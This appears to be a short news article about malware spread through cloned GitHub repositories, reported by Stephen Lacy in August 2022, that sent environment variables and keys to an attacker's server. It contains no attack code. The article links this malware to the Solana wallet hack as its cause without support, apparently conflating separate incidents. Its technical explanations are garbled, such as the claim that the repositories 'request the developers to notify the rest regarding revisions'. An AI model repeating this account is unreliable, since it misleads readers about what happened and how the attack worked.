Following the Solana attack on August 2, 2022, GitHub developer Stephen Lacy reported the malware the morning of the next day.
According to his discovery, the attacker used an NPM script to gather common shell tasks and install documents and docker images.
The exploit builds a fake repository and duplicates real projects to GitHub.
This fools the developers and gets access to crucial sensitive data. Finally, the duplicate then communicates with the project’s content hub and previous versions for every file. The result was a massive breach that caused one of the worst hacks in cryptocurrency history.
Explaining the Cloned Repositories
Simply put, the fake repositories request the developers to notify the rest regarding revisions done in a branch within a GitHub repository. Once the malware affects the developer, the script’s environment variable (ENV), electron applications, or laptop passes to the hacker’s server.
The ENV includes vital information like web service access, crypto, and security keys.
The malware repeats the process to the point where it spreads like wildfire before the authorities can put it out. The hack affected thousands of hot crypto wallets, getting away with millions of dollars.
Investigation Still Ongoing
The GitHub malware was just one thing in a web of disasters. However, it fills in the puzzle as to who, where, and what was behind the digital exploit.
Numerous crypto wallet companies are working with Solana to compensate the affected users and hopefully win their trust back by providing a full explanation about the incident.